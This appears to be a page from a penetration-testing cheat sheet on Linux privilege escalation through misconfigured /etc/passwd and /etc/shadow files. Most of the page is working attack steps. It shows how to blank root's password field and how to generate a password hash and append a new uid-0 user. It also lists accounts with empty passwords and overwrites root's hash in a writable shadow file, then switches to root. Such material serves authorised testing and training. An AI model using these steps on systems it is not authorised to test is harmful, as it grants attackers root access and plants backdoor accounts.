/etc/passwd & /etc/shadow

/etc/passwd readible - root no password ?

No x ?

$ head -n 1 /etc/passwd

root::0:0:root:/root:/bin/bash

$ su

/etc/passwd writable

Change root line (remove x):

Before:

root:x:0:0:root:/root:/bin/bash

After:

root::0:0:root:/root:/bin/bash
Capabilities

Create new user

  1. Create a password hash: openssl passwd -1 -salt [salt] [password] Ex: openssl passwd -1 -salt new 123 $1$new$p7ptkEKU1HnaHpRtzNizS1

  2. Add an new entry to /etc/passwd : Ex: new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash

  3. Switch to the new user su new password: 123 id uid=0(new) gid=0(root) groups=0(root)

LogoEditing /etc/passwd File for Privilege EscalationHacking Articles

/etc/shadow readible

Crack hashes

Cracking

Users with no password

awk -F: '($2=="") {print $1}' /etc/shadow

/etc/shadow writable

  1. Generate a new password hash with a password of your choice: mkpasswd -m sha-512 newpasswordhere

  2. Edit the /etc/shadow file and replace the original root user's password hash with the one you just generated.

  3. Switch to the root user, using the new password:

    su root

PreviousWritable files / directoriesNextCredentials Hunting

Last updated